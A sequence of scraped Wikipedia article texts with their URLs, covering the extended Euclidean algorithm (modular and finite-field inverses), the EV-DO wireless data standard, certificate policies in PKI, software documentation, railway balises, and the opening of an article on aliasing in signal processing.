Ifbdividesaevenly, the algorithm executes only one iteration, and we haves= 1at the end of the algorithm. It is the only case where the output is an integer.
The extended Euclidean algorithm is the essential tool for computingmultiplicative inversesin modular structures, typically themodular integersand thealgebraic field extensions. A notable instance of the latter case are the finite fields of non-prime order.
Ifnis a positive integer, theringZ/nZmay be identified with the set{0, 1, ...,n-1}of the remainders ofEuclidean divisionbyn, the addition and the multiplication consisting in taking the remainder bynof the result of the addition and the multiplication of integers. An elementaofZ/nZhas a multiplicative inverse (that is, it is aunit) if it iscoprimeton. In particular, ifnisprime,ahas a multiplicative inverse if it is not zero (modulon). ThusZ/nZis a field if and only ifnis prime.
Bézout's identity asserts thataandnare coprime if and only if there exist integerssandtsuch that
Reducing this identity modulongives
Thust, or, more exactly, the remainder of the division oftbyn, is the multiplicative inverse ofamodulon.
To adapt the extended Euclidean algorithm to this problem, one should remark that the Bézout coefficient ofnis not needed, and thus does not need to be computed. Also, for getting a result which is positive and lower thann, one may use the fact that the integertprovided by the algorithm satisfies|t| <n. That is, ift< 0, one must addnto it at the end. This results in thepseudocode, in which the inputnis an integer larger than 1.
The extended Euclidean algorithm is also the main tool for computingmultiplicative inversesinsimple algebraic field extensions. An important case, widely used incryptographyandcoding theory, is that offinite fieldsof non-prime order. In fact, ifpis a prime number, andq=pd, the field of orderqis a simple algebraic extension of theprime fieldofpelements, generated by a root of anirreducible polynomialof degreed.
A simple algebraic extensionLof a fieldK, generated by the root of an irreducible polynomialpof degreedmay be identified to thequotient ringK[X]/⟨p⟩,{\displaystyle K[X]/\langle p\rangle ,}, and its elements are inbijective correspondencewith the polynomials of degree less thand. The addition inLis the addition of polynomials. The multiplication inLis the remainder of theEuclidean divisionbypof the product of polynomials. Thus, to complete the arithmetic inL, it remains only to define how to compute multiplicative inverses. This is done by the extended Euclidean algorithm.
The algorithm is very similar to that provided above for computing the modular multiplicative inverse. There are two main differences: firstly the last but one line is not needed, because the Bézout coefficient that is provided always has a degree less thand. Secondly, the greatest common divisor which is provided, when the input polynomials are coprime, may be any non zero elements ofK; this Bézout coefficient (a polynomial generally of positive degree) has thus to be multiplied by the inverse of this element ofK. In the pseudocode which follows,pis a polynomial of degree greater than one, andais a polynomial.
For example, if the polynomial used to define the finite field GF(28) isp=x8+x4+x3+x+ 1, anda=x6+x4+x+ 1is the element whose inverse is desired, then performing the algorithm results in the computation described in the following table. Let us recall that in fields of order 2n, one has −z=zandz+z= 0 for every elementzin the field). Since 1 is the only nonzero element of GF(2), the adjustment in the last line of the pseudocode is not needed.
Thus, the inverse isx7+x6+x3+x, as can be confirmed bymultiplying the two elements together, and taking the remainder bypof the result.
One can handle the case of more than two numbers iteratively. First we show thatgcd(a,b,c)=gcd(gcd(a,b),c){\displaystyle \gcd(a,b,c)=\gcd(\gcd(a,b),c)}. To prove this letd=gcd(a,b,c){\displaystyle d=\gcd(a,b,c)}. By definition of gcdd{\displaystyle d}is a divisor ofa{\displaystyle a}andb{\displaystyle b}. Thusgcd(a,b)=kd{\displaystyle \gcd(a,b)=kd}for somek{\displaystyle k}. Similarlyd{\displaystyle d}is a divisor ofc{\displaystyle c}soc=jd{\displaystyle c=jd}for somej{\displaystyle j}. Letu=gcd(k,j){\displaystyle u=\gcd(k,j)}. By our construction ofu{\displaystyle u},ud|a,b,c{\displaystyle ud|a,b,c}but sinced{\displaystyle d}is the greatest divisoru{\displaystyle u}is aunit. And sinceud=gcd(gcd(a,b),c){\displaystyle ud=\gcd(\gcd(a,b),c)}the result is proven.
So ifna+mb=gcd(a,b){\displaystyle na+mb=\gcd(a,b)}then there arex{\displaystyle x}andy{\displaystyle y}such thatxgcd(a,b)+yc=gcd(a,b,c){\displaystyle x\gcd(a,b)+yc=\gcd(a,b,c)}so the final equation will be
So then to apply tonnumbers we use induction
with the equations following directly.
|
https://en.wikipedia.org/wiki/Extended_Euclidean_algorithm
|
Evolution-Data Optimized(EV-DO,EVDO, etc.) is atelecommunicationsstandard for thewirelesstransmission of data throughradiosignals, typically forbroadband Internet access. EV-DO is an evolution of theCDMA2000(IS-2000) standard which supports high data rates and can be deployed alongside a wireless carrier's voice services. It uses advancedmultiplexingtechniques includingcode-division multiple access(CDMA) as well astime-division multiplexing(TDM) to maximize throughput. It is a part of theCDMA2000family of standards and has been adopted by manymobile phoneservice providers around the world particularly those previously employingCDMAnetworks. It is also used on theGlobalstarsatellite phonenetwork.[1]
An EV-DO channel has a bandwidth of 1.25 MHz, the same bandwidth size that IS-95A (IS-95) and IS-2000 (1xRTT) use,[2]though the channel structure is very different. The back-end network is entirelypacket-based, and is not constrained by restrictions typically present on acircuit switchednetwork.
The EV-DO feature of CDMA2000 networks provides access to mobile devices withforward linkair interface speeds of up to 2.4 Mbit/s with Rel. 0 and up to 3.1 Mbit/s with Rev. A. Thereverse linkrate for Rel. 0 can operate up to 153 kbit/s, while Rev. A can operate at up to 1.8 Mbit/s. It was designed to be operated end-to-end as anIP-based network, and can support any application which can operate on such a network and bit rate constraints.
There have been several revisions of the standard, starting with Release 0 (Rel. 0). This was later expanded upon with Revision A (Rev. A) to supportquality of service(to improve latency) and higher rates on the forward and reverse link. In late 2006, Revision B (Rev. B) was published, whose features include the ability to bundle multiple carriers to achieve even higher rates and lower latencies (seeTIA-856 Rev. Bbelow). The upgrade from EV-DO Rev. A to Rev. B involves a software update of the cell site modem, and additional equipment for new EV-DO carriers. Existing cdma2000 operators may have to retune some of their existing 1xRTT channels to other frequencies, as Rev. B requires all DO carriers be within 5 MHz.
The initial design of EV-DO was developed byQualcommin 1999 to meetIMT-2000requirements for a greater-than-2 Mbit/s down link for stationary communications, as opposed to mobile communication (i.e., moving cellular phone service). Initially, the standard was called High Data Rate (HDR), but was renamed to 1xEV-DO after it was ratified by theInternational Telecommunication Union(ITU) under the designationTIA-856. Originally, 1xEV-DO stood for "1x Evolution-Data Only", referring to its being a direct evolution of the1x(1xRTT) air interface standard, with its channels carrying only data traffic. The title of the 1xEV-DO standard document is "cdma2000 High Rate Packet Data Air Interface Specification", as cdma2000 (lowercase) is another name for the 1x standard, numerically designated as TIA-2000.
Later, due to possible negative connotations of the word "only", the "DO"-part of the standard's name 1xEV-DO was changed to stand for "Data Optimized", the full name - EV-DO now stands for "Evolution-Data Optimized." The 1x prefix has been dropped by many of the major carriers, and is marketed simply as EV-DO.[3]This provides a more market-friendly emphasis of the technology being data-optimized.
The primary characteristic that differentiates an EV-DO channel from a 1xRTT channel is that it istime multiplexedon the forward link (from the tower to the mobile). This means that a single mobile has full use of the forward traffic channel within a particular geographic area (a sector) during a given slot of time. Using this technique, EV-DO is able tomodulateeach user’s time slot independently. This allows the service of users in favorable RF conditions with very complexmodulationtechniques while also serving users in poor RF conditions with simpler (and more redundant) signals.[4]
The forward channel is divided into slots, each being 1.667 ms long. In addition to user traffic, overhead channels are interlaced into the stream, which include the 'pilot', which helps the mobile find and identify the channel, theMedia Access Channel (MAC)which tells the mobile devices when their data is scheduled, and the 'control channel', which contains other information the network needs the mobile devices to know.
Themodulationto be used to communicate with a given mobile unit is determined by the mobile device itself; it listens to the traffic on the channel, and depending on the receive signal strength along with the perceived multi-path and fading conditions, makes a best guess as to what data-rate it can sustain while maintaining a reasonable frame error rate of 1-2%. It then communicates this information back to the serving sector in the form of an integer between 1 and 12 on the "Digital Rate Control" (DRC) channel. Alternatively, the mobile can select a "null" rate (DRC 0), indicating that the mobile either cannot decode data at any rate, or that it is attempting tohand offto another serving sector.[4]
The DRC values are as follows:[5]
Another important aspect of the EV-DO forward link channel is the scheduler. The scheduler most commonly used is called "proportional fair". It's designed to maximize sector throughput while also guaranteeing each user a certain minimum level of service. The idea is to schedule mobiles reporting higher DRC indices more often, with the hope that those reporting worse conditions will improve in time.
The system also incorporatesIncremental Redundancy Hybrid ARQ. Each sub-packet of a multi-slot transmission is aturbo-codedreplica of the original data bits. This allows mobiles to acknowledge a packet before all of its sub-sections have been transmitted. For example, if a mobile transmits a DRC index of 3 and is scheduled to receive data, it will expect to get data during four time slots. If after decoding the first slot the mobile is able to determine the entire data packet, it can send an early acknowledgement back at that time; the remaining three sub-packets will be cancelled. If however the packet is not acknowledged, the network will proceed with the transmission of the remaining parts until all have been transmitted or the packet is acknowledged.[4]
The reverse link (from the mobile back to theBase Transceiver Station) on EV-DO Rel. 0 operates very similar to that ofCDMA2000 1xRTT. The channel includes a reverse link pilot (helps with decoding the signal) along with the user data channels. Some additional channels that do not exist in 1x include the DRC channel (described above) and the ACK channel (used forHARQ). Only the reverse link has any sort ofpower control, because the forward link is always transmitted at full power for use by all the mobiles.[5]The reverse link has both open loop and closed loop power control. In the open loop, the reverse link transmission power is set based upon the received power on the forward link. In the closed loop, the reverse link power is adjusted up or down 800 times a second, as indicated by the serving sector (similar to1x).[6]
All of the reverse link channels are combined usingcode divisionand transmitted back to the base station usingBPSK[7]where they are decoded. The maximum speed available for user data is 153.2 kbit/s, but in real-life conditions this is rarely achieved. Typical speeds achieved are between 20-50 kbit/s.
Revision A of EV-DO makes several additions to the protocol while keeping it completely backwards compatible with Release 0.
These changes included the introduction of several new forward link data rates that increase the maximum burst rate from 2.45 Mbit/s to 3.1 Mbit/s. Also included were protocols that would decrease connection establishment time (called enhanced access channel MAC), the ability for more than one mobile to share the same timeslot (multi-user packets) and the introduction ofQoSflags. All of these were put in place to allow for low latency, low bit rate communications such asVoIP.[8]
The additional forward rates for EV-DO Rev. An are:[9]
In addition to the changes on the forward link, the reverse link was enhanced to support higher complexitymodulation(and thus higher bit rates). An optional secondary pilot was added, which is activated by the mobile when it tries to achieve enhanced data rates. To combat reverse link congestion and noise rise, the protocol calls for each mobile to be given an interference allowance which is replenished by the network when the reverse link conditions allow it.[9]The reverse link has a maximum rate of 1.8 Mbit/s, but under normal conditions users experience a rate of approximately 500-1000 Kbit/s but with morelatencythanDOCSISandDSL.
EV-DO Rev. B is a multi-carrier evolution of the Rev. A specification. It maintains the capabilities of EV-DO Rev. A, and provides the following enhancements:
Qualcomm early on realized that EV-DO was a stop-gap solution, and foresaw an upcoming format war betweenLTEand determined that a new standard would be needed. Qualcomm originally called this technology EV-DV (Evolution Data and Voice).[10]As EV-DO became more pervasive, EV-DV evolved into EV-DO Rev C.
The EV-DO Rev. C standard was specified by3GPP2to improve theCDMA2000mobile phone standard for next generation applications and requirements. It was proposed byQualcommas the natural evolution path for CDMA2000 and the specifications were published by 3GPP2 (C.S0084-*) and TIA (TIA-1121) in 2007 and 2008 respectively.[11][12]
The brand nameUMB (Ultra Mobile Broadband)was introduced in 2006 as a synonym for this standard.[13]
UMB was intended to be afourth-generationtechnology, which would make it compete withLTEandWiMAX. These technologies use a high bandwidth, low latency, underlyingTCP/IPnetwork with high level services such as voice built on top. Widespread deployment of 4G networks promises to make applications that were previously not feasible not only possible but ubiquitous. Examples of such applications include mobilehigh definition videostreaming and mobile gaming.
Like LTE, the UMB system was to be based upon Internet networking technologies running over a next generation radio system, with peak rates of up to 280 Mbit/s. Its designers intended for the system to be more efficient and capable of providing more services than the technologies it was intended to replace. To provide compatibility with the systems it was intended to replace, UMB was to support handoffs with other technologies including existing CDMA2000 1X and 1xEV-DO systems.
UMB's use of OFDMA would have eliminated many of the disadvantages of the CDMA technology used by its predecessor, including the "breathing" phenomenon, the difficulty of adding capacity via microcells, the fixed bandwidth sizes that limit the total bandwidth available to handsets, and the near complete control by one company of the required intellectual property.
While capacity of existing Rel. B networks can be increased 1.5-fold by using EVRC-B voice codec and QLIC handset interference cancellation, 1x Advanced and EV-DO Advanced offers up to 4x network capacity increase using BTS interference cancellation (reverse link interference cancellation), multi-carrier links, and smart network management technologies.[14][15]
In November 2008,Qualcomm, UMB's lead sponsor, announced it was ending development of the technology, favoringLTEinstead. This followed the announcement that most CDMA carriers chose to adopt eitherWiMAXorLTEstandard as their 4G technology. In fact no carrier had announced plans to adopt UMB.[16]
However, during the ongoing development process of the 4G technology, 3GPP added some functionalities to LTE, allowing it to become a sole upgrade path for all wireless networks.
|
https://en.wikipedia.org/wiki/EVDO
|
Acertificate policy(CP) is a document which aims to state what are the different entities of apublic key infrastructure(PKI), their roles and their duties. This document is published in the PKI perimeter.
When in use withX.509certificates, a specific field can be set to include a link to the associated certificate policy. Thus, during an exchange, any relying party has an access to the assurance level associated with the certificate, and can decide on thelevel of trustto put in the certificate.
The reference document for writing a certificate policy is, as of December 2010[update],RFC3647. The RFC proposes a framework for the writing of certificate policies andCertification Practice Statements(CPS). The points described below are based on the framework presented in the RFC.
The document should describe the general architecture of the related PKI, present the different entities of the PKI and any exchange based on certificates issued by this very same PKI.
An important point of the certificate policy is the description of the authorized and prohibited certificate uses. When a certificate is issued, it can be stated in its attributes what use cases it is intended to fulfill. For example, a certificate can be issued fordigital signatureofe-mail(akaS/MIME),encryptionof data,authentication(e.g. of aWeb server, as when one usesHTTPS) or further issuance of certificates (delegation of authority). Prohibited uses are specified in the same way.
The document also describes how certificates names are to be chosen, and besides, the associated needs foridentificationandauthentication. When a certification application is filled, thecertification authority(or, by delegation, theregistration authority) is in charge of checking the information provided by the applicant, such as his identity. This is to make sure that the CA does not take part in anidentity theft.
Thegeneration
The different procedures for certificate application, issuance, acceptance, renewal, re-key, modification and revocation are a large part of the document. These procedures describe how each actor of the PKI has to act in order for the whole assurance level to be accepted.
Then, a chapter is found regarding physical and procedural controls,auditand logging procedures involved in the PKI to ensuredata integrity,availabilityandconfidentiality.
This part describes what are the technical requirements regarding key sizes, protection ofprivate keys(by use ofkey escrow) and various types of controls regarding the technical environment (computers, network).
Thoselistsare a vital part of any public key infrastructure, and as such, a specific chapter is dedicated to the description of the management associated with these lists, to ensure consistency between certificate status and the content of the list.
The PKI needs to be audited to ensure it complies with the rules stated in its documents, such as the certificate policy. The procedures used to assess suchcomplianceare described here.
This last chapter tackles all remaining points, by example all the PKI-associated legal matters.
|
https://en.wikipedia.org/wiki/Certificate_policy
|
Software documentationis written text or illustration that accompanies computersoftwareor is embedded in the source code. The documentation either explains how the software operates or how to use it, and may mean different things to people in different roles.
Documentationis an important part of software engineering. Types of documentation include:
Requirementsdocumentation is the description of what a particular software does or should do. It is used throughoutdevelopmentto communicate how the software functions or how it is intended to operate. It is also used as an agreement or as the foundation for agreement on what the software will do. Requirements are produced and consumed by everyone involved in the production of software, including:end users,customers,project managers,sales,marketing,software architects,usability engineers,interaction designers,developers, andtesters.
Requirements come in a variety of styles, notations and formality. Requirements can be goal-like (e.g.,distributed work environment), close to design (e.g.,builds can be started by right-clicking a configuration file and selecting the 'build' function), and anything in between. They can be specified as statements innatural language, as drawn figures, as detailedmathematical formulas, or as a combination of them all.
The variation and complexity of requirement documentation make it a proven challenge. Requirements may be implicit and hard to uncover. It is difficult to know exactly how much and what kind of documentation is needed and how much can be left to the architecture and design documentation, and it is difficult to know how to document requirements considering the variety of people who shall read and use the documentation. Thus, requirements documentation is often incomplete (or non-existent). Without proper requirements documentation, software changes become more difficult — and therefore more error prone (decreasedsoftware quality) and time-consuming (expensive).
The need for requirements documentation is typically related to the complexity of the product, the impact of the product, and thelife expectancyof the software. If the software is very complex or developed by many people (e.g., mobile phone software), requirements can help better communicate what to achieve. If the software is safety-critical and can have a negative impact on human life (e.g., nuclear power systems, medical equipment, mechanical equipment), more formal requirements documentation is often required. If the software is expected to live for only a month or two (e.g., very small mobile phone applications developed specifically for a certain campaign) very little requirements documentation may be needed. If the software is a first release that is later built upon, requirements documentation is very helpful when managing the change of the software and verifying that nothing has been broken in the software when it is modified.
Traditionally, requirements are specified in requirements documents (e.g. using word processing applications and spreadsheet applications). To manage the increased complexity and changing nature of requirements documentation (and software documentation in general), database-centric systems and special-purposerequirements managementtools are advocated.
In Agile software development, requirements are often expressed asuser storieswith accompanying acceptance criteria. User stories are typically part of a feature, or an epic, which is a broader functionality or set of related functionalities that deliver a specific value to the user based on the business requirements.
Architecture documentation (also known assoftware architecture description) is a special type of design document. In a way, architecture documents are third derivative from the code (design documentbeing second derivative, and code documents being first). Very little in the architecture documents is specific to the code itself. These documents do not describe how to program a particular routine, or even why that particular routine exists in the form that it does, but instead merely lays out the general requirements that would motivate the existence of such a routine. A good architecture document is short on details but thick on explanation. It may suggest approaches for lower level design, but leave the actual exploration trade studies to other documents.
Another type of design document is the comparison document, or trade study. This would often take the form of awhitepaper. It focuses on one specific aspect of the system and suggests alternate approaches. It could be at theuser interface, code, design, or even architectural level. It will outline what the situation is, describe one or more alternatives, and enumerate the pros and cons of each. A good trade study document is heavy on research, expresses its idea clearly (without relying heavily on obtusejargonto dazzle the reader), and most importantly is impartial. It should honestly and clearly explain the costs of whatever solution it offers as best. The objective of a trade study is to devise the best solution, rather than to push a particular point of view. It is perfectly acceptable to state no conclusion, or to conclude that none of the alternatives are sufficiently better than the baseline to warrant a change. It should be approached as a scientific endeavor, not as a marketing technique.
A very important part of the design document in enterprise software development is the Database Design Document (DDD). It contains Conceptual, Logical, and Physical Design Elements. The DDD includes the formal information that the people who interact with the database need. The purpose of preparing it is to create a common source to be used by all players within the scene. The potential users are:
When talking aboutRelational DatabaseSystems, the document should include following parts:
It is very important to include all information that is to be used by all actors in the scene. It is also very important to update the documents as any change occurs in the database as well.
It is important for the code documents associated with the source code (which may includeREADMEfiles andAPIdocumentation) to be thorough, but not so verbose that it becomes overly time-consuming or difficult to maintain them. Various how-to and overview documentation guides are commonly found specific to the software application or software product being documented byAPI writers. This documentation may be used by developers, testers, and also end-users. Today, a lot of high-end applications are seen in the fields of power, energy, transportation, networks, aerospace, safety, security, industry automation, and a variety of other domains. Technical documentation has become important within such organizations as the basic and advanced level of information may change over a period of time with architecture changes. There is evidence that the existence of good code documentation actually reduces maintenance costs for software.[1]
Code documents are often organized into areference guidestyle, allowing a programmer to quickly look up an arbitrary function or class.
Often,toolssuch asDoxygen,NDoc,Visual Expert,Javadoc,JSDoc,EiffelStudio,Sandcastle,ROBODoc,POD,TwinText, or Universal Report can be used to auto-generate the code documents—that is, they extract the comments andsoftware contracts, where available, from the source code and create reference manuals in such forms as text orHTMLfiles.
The idea of auto-generating documentation is attractive to programmers for various reasons. For example, because it is extracted from the source code itself (for example, throughcomments), the programmer can write it while referring to the code, and use the same tools used to create the source code to make the documentation. This makes it much easier to keep the documentation up-to-date.
A possible downside is that only programmers can edit this kind of documentation, and it depends on them to refresh the output (for example, by running acron jobto update the documents nightly). Some would characterize this as a pro rather than a con.
Respected computer scientistDonald Knuthhas noted that documentation can be a very difficult afterthought process and has advocatedliterate programming, written at the same time and location as thesource codeand extracted by automatic means. The programming languagesHaskellandCoffeeScripthave built-in support for a simple form of literate programming, but this support is not widely used.
Elucidative Programming is the result of practical applications of Literate Programming in real programming contexts. The Elucidative paradigm proposes that source code and documentation be stored separately.
Often, software developers need to be able to create and access information that is not going to be part of the source file itself. Suchannotationsare usually part of several software development activities, such as code walks and porting, where third-party source code is analysed in a functional way. Annotations can therefore help the developer during any stage of software development where a formal documentation system would hinder progress.
Unlike code documents, user documents simply describe how a program is used.
In the case of asoftware library, the code documents and user documents could in some cases be effectively equivalent and worth conjoining, but for a general application this is not often true.
Typically, the user documentation describes each feature of the program, and assists the user in realizing these features. It is very important for user documents to not be confusing, and for them to be up to date. User documents do not need to be organized in any particular way, but it is very important for them to have a thoroughindex. Consistency and simplicity are also very valuable. User documentation is considered to constitute a contract specifying what the software will do.API Writersare very well accomplished towards writing good user documents as they would be well aware of the software architecture and programming techniques used. See alsotechnical writing.
User documentation can be produced in a variety of online and print formats.[2]However, there are three broad ways in which user documentation can be organized.
A common complaint among users regarding software documentation is that only one of these three approaches was taken to the near-exclusion of the other two. It is common to limit provided software documentation forpersonal computerstoonline helpthat gives only reference information on commands or menu items. The job of tutoring new users or helping more experienced users get the most out of a program is left to private publishers, who are often given significant assistance by the software developer.
Like other forms of technical documentation, good user documentation benefits from an organized process of development. In the case of user documentation, the process as it commonly occurs in industry consists of five steps:[5]
For many applications it is necessary to have some promotional materials to encourage casual observers to spend more time learning about the product. This form of documentation has three purposes:
"The resistance to documentation among developers is well known and needs no emphasis."[10]This situation is particularly prevalent inagile software developmentbecause these methodologies try to avoid any unnecessary activities that do not directly bring value.
Specifically, theAgile Manifestoadvocates valuing "working software over comprehensive documentation", which could be interpreted cynically as "We want to spend all our time coding. Remember, real programmers don't write documentation."[11]
A survey among software engineering experts revealed, however, that documentation is by no means considered unnecessary in agile development.
Yet it is acknowledged that there are motivational problems in development, and that documentation methods tailored to agile development (e.g. throughReputation systemsandGamification) may be needed.[12][13]
Docs as Codeis an approach to documentation that treats it with the same rigor and processes as software code. This includes:
|
https://en.wikipedia.org/wiki/Software_documentation
|
Abalise(/bəˈliːz/bə-LEEZ) is an electronicbeaconortransponderplaced between therailsof a railway as part of anautomatic train protection(ATP) system. TheFrenchwordbaliseis used to distinguish these beacons from other kinds of beacons.[1]
Balises are used in theKVBsignalling system installed on main lines of the French railway network, other than the high-speedLignes à Grande Vitesse.
Balises constitute an integral part of theEuropean Train Control System, where they serve as "beacons" giving the exact location of a train. The ETCS signalling system is gradually being introduced on railways throughout theEuropean Union.[2]
Balises are also used in theChinese Train Control Systemversions CTCS-2 and CTCS-3 installed on high-speed rail lines in China, which is based on theEuropean Train Control System.
A balise which complies with the European Train Control System specification is called aEurobalise.
A balise typically needs no power source. In response toradio frequencyenergy broadcast by aBalise Transmission Modulemounted under a passing train, the balise either transmits information to the train (uplink) or receives information from the train (downlink, although this function is rarely used). The transmission rate of Eurobalises is sufficient for a complete 'telegram' to be received by a train passing at any speed up to 500 km/h.
A balise may be either a 'Fixed Data Balise', or 'Fixed Balise' for short, transmitting the same data to every train, or a 'Transparent Data Balise' which transmits variable data, also called a 'Switchable' or 'Controllable Balise'. (Note that the word 'fixed' refers to the information transmitted by the balise, not to its physical location. All balises are immobile).
A fixed balise is programmed to transmit the same data to every train. Information transmitted by a fixed balise typically includes: the location of the balise; thegeometry of the line, such as curves and gradients; and any speed restrictions. The programming is performed using a wireless programming device. Thus a fixed balise can notify a train of its exact location, and the distance to the next signal, and can warn of any speed restrictions.
A controllable balise is connected to a Lineside Electronics Unit (LEU), which transmits dynamic data to the train, such as signal indications. Balises forming part of anETCSLevel 1 signalling system employ this capability.[3]The LEU integrates with the conventional (national) signal system either by connecting to the linesiderailway signalor to thesignalling controltower.
Balises must be deployed in pairs so that the train can distinguish the direction of travel 1→2 from direction 2→1, unless they are linked to a previous balise group in which case they can contain only one balise. Extra balises can be installed if the volume of data is too great.
Balises operate with equipment on the train to provide a system that enhances the safety of train operation: at the approaches to stations with multiple platforms fixed balises may be deployed, as a more accurate supplement toGPS, to enable safe operation of automaticselective door opening.[4]
The balise is typically mounted on or betweensleepersor ties in the centre line of the track.
A train travelling at maximum speed of 500 km/h (310 mph) will transmit and receive a minimum of three copies of the telegram while passing over each Eurobalise. The earlier KER balises (KVB, EBICAB, RSDD) were specified to work up to 350 km/h (220 mph).[5]
The train's on-board computer uses the data from the balises to determine the safe speed profile for the line ahead. Enough information is needed to allow the train to come to a safe standstill if required.
The data in the balise can include the distance to the next balise. This is used to check for missing balises which could otherwise lead to a potentialwrong-side failure.
At the start and end of ATP-equipped territory, a pair of fixed balises are often used to inform the onboard ATP equipment to start or stop supervision of the train movements.
Eurobalises are used in:
Balises other than Eurobalises are used in:
The earliest automatic train protection system were purely mechanical with atripcockwhich could be connected directly to the braking system by releasing the opening a switch in the hydraulic system. There were multiple incidents where trains had overrun a stop signal but due to excessive speed still crashed despite the automatic stop. Multiple systems were invented to show the speed in the driver's cab and to provide an electronic system on the train that would prevent speeding. With the advent of high-speed trains it was generally expected that a speed indicator on line-side signals is not sufficient beyond 160 km/h (99 mph) so that all these trains needcab signalling.
A combined solution to the requirements was the GermanLZBsystem that was presented in 1965. The original installations were all hard-wired logic. The first real cab electronics was presented in 1972 (named LZB L72) and a cab computer was introduced by 1980 (LZB 80). The LZB system uses a wire in the middle of the tracks that had loops at a distance of 100 m (330 ft) so that the position of a train was known more precisely than in any earlier system. As a result, the LZB system was not only used on high-speed tracks but also in commuter rail to increase throughput. Due to the deployment costs of the system however it was restricted to these application areas.
During the 1970s British Rail developed the C-APT, the system utilised passive transponders (balises) placed at no more than 1km track intervals, that would transmit the track speed (in an 80bit packet) to a passing train, for in cab display. If the trains control system failed to receive an update, within 1km of the last signal, the displayed speed limit would be blanked an audio tone the driver had to respond to generated, else the trains brakes were automatically applied, the system would be see revenue service from December 1981, with the introduction of theBritish Rail Class 370.[6]
The development of a system using the principle of passive balises with fixed or controlled information started in 1975 by LMEricson and SRT, following an incident in Norway in 1975 (Tretten). The LME/SRT system became the Ebicab system. The Ebicab system established the principles of using magnetic coupling, 27 MHz downlink from the antenna on the locomotive to energize the balises, and an uplink using 4,5 MHz to transmit information telegrams from the balises. The controlled information in the balises is encoded from statuses in the signalling system. The telegrams contains information about permitted speeds, and distances. The information is used in the on-board computer to calculate brake curves, monitor speed and eventually apply brakes. In Norway, the first line equipped with Ebicab as ATP was operational in 1983. The Ebicab principles are subsequently used in KVB and RSDD systems and also for the ERTMS ETCS balises. During the 1980s, other cab computers were introduced to read the older signalling and to overlay it with better control. The GermanPZ80was able to check the speed in steps of 10 km/h (6.2 mph). The FrenchKVBreplaced the external system with balises in the early 1990s to transmit a combined information for oncoming signal aspects and the allowed train speed. Siemens did also invent a successor to the PZB signalling that was deployed asZUB 121[de]in Switzerland since 1992 andZUB 123[de]in Denmark since 1992. ABB improved the external balises in the EBICAB 900 system which as then adopted in Spain and Italy.
Siemens had presented a study on balise systems in 1992[7]which influenced the choice of using a technology based on KVB and GSM instead of LZB when theEuropean Rail Traffic Management Systemwas researching a possible train signalling for Europe. The first Eurobalises were tested in 1996 and later train protection systems used them as a basis for their signalling needs.
|
https://en.wikipedia.org/wiki/Balise
|
Insignal processingand related disciplines,aliasingis a phenomenon that a reconstructed signal from samples of the original signal contains low frequency components that are not present in the original one. This is caused when, in the original signal, there are components at frequency exceeding a certain frequency calledNyquist frequency,fs/2{\textstyle f_{s}/2}, wherefs{\textstyle f_{s}}is the sampling frequency (undersampling). This is because typical reconstruction methods use low frequency components while there are a number of frequency components, called aliases, which sampling result in the identical sample. It also often refers to thedistortionorartifactthat results when a signal reconstructed from samples is different from the original continuous signal.
Aliasing can occur in signals sampled in time, for instance indigital audioor thestroboscopic effect, and is referred to astemporal aliasing. Aliasing in spatially sampled signals (e.g.,moiré patternsindigital images) is referred to asspatial aliasing.
Aliasing is generally avoided by applyinglow-pass filtersoranti-aliasing filters(AAF) to the input signal before sampling and when converting a signal from a higher to a lower sampling rate. Suitablereconstruction filteringshould then be used when restoring the sampled signal to the continuous domain or converting a signal from a lower to a higher sampling rate. Forspatial anti-aliasing, the types of anti-aliasing includefast approximate anti-aliasing(FXAA),multisample anti-aliasing, andsupersampling.
When a digital image is viewed, areconstructionis performed by a display or printer device, and by the eyes and the brain. If the image data is processed incorrectly during sampling or reconstruction, the reconstructed image will differ from the original image, and an alias is seen.
An example of spatial aliasing is themoiré patternobserved in a poorly pixelized image of a brick wall.Spatial anti-aliasingtechniques avoid such poor pixelizations. Aliasing can be caused either by the sampling stage or the reconstruction stage; these may be distinguished by calling sampling aliasingprealiasingand reconstruction aliasingpostaliasing.[1]
Temporal aliasing is a major concern in the sampling of video and audio signals. Music, for instance, may contain high-frequency components that are inaudible to humans. If a piece of music is sampled at 32,000samples per second(Hz), any frequency components at or above 16,000Hz(theNyquist frequencyfor this sampling rate) will cause aliasing when the music is reproduced by adigital-to-analog converter(DAC). The high frequencies in the analog signal will appear as lower frequencies (wrong alias) in the recorded digital sample and, hence, cannot be reproduced by the DAC. To prevent this, ananti-aliasing filteris used to remove components above the Nyquist frequency prior to sampling.
In video or cinematography, temporal aliasing results from the limited frame rate, and causes thewagon-wheel effect, whereby a spoked wheel appears to rotate too slowly or even backwards. Aliasing has changed its apparent frequency of rotation. A reversal of direction can be described as anegative frequency. Temporal aliasing frequencies in video and cinematography are determined by the frame rate of the camera, but the relative intensity of the aliased frequencies is determined by the shutter timing (exposure time) or the use of a temporal aliasing reduction filter during filming.[2][unreliable source?]
Like the video camera, most sampling schemes are periodic; that is, they have a characteristicsampling frequencyin time or in space. Digital cameras provide a certain number of samples (pixels) per degree or per radian, or samples per mm in the focal plane of the camera. Audio signals are sampled (digitized) with ananalog-to-digital converter, which produces a constant number of samples per second. Some of the most dramatic and subtle examples of aliasing occur when the signal being sampled also has periodic content.
Actual signals have a finite duration and their frequency content, as defined by theFourier transform, has no upper bound. Some amount of aliasing always occurs when such continuous functions over time are sampled. Functions whose frequency content is bounded (bandlimited) have an infinite duration in the time domain. If sampled at a high enough rate, determined by thebandwidth, the original function can, in theory, be perfectly reconstructed from the infinite set of samples.
Sometimes aliasing is used intentionally on signals with no low-frequency content, calledbandpasssignals.Undersampling, which creates low-frequency aliases, can produce the same result, with less effort, as frequency-shifting the signal to lower frequencies before sampling at the lower rate. Some digital channelizers exploit aliasing in this way for computational efficiency.[3](SeeSampling (signal processing),Nyquist rate (relative to sampling), andFilter bank.)
Sinusoidsare an important type of periodic function, because realistic signals are often modeled as the summation of many sinusoids of different frequencies and different amplitudes (for example, with aFourier seriesortransform). Understanding what aliasing does to the individual sinusoids is useful in understanding what happens to their sum.
When sampling a function at frequencyfs(i.e., the sampling interval is1/fs), the following functions of time(t)yield identical sets of samples if the sampling starts fromt=0{\textstyle t=0}such thatt=1fsn{\displaystyle t={\frac {1}{f_{s}}}n}wheren=0,1,2,3{\textstyle n=0,1,2,3}, and so on:
{sin(2π(f+Nfs)t+φ),N=0,±1,±2,±3,…}.{\displaystyle \{\sin(2\pi (f+Nf_{s})t+\varphi ),N=0,\pm 1,\pm 2,\pm 3,\ldots \}.}
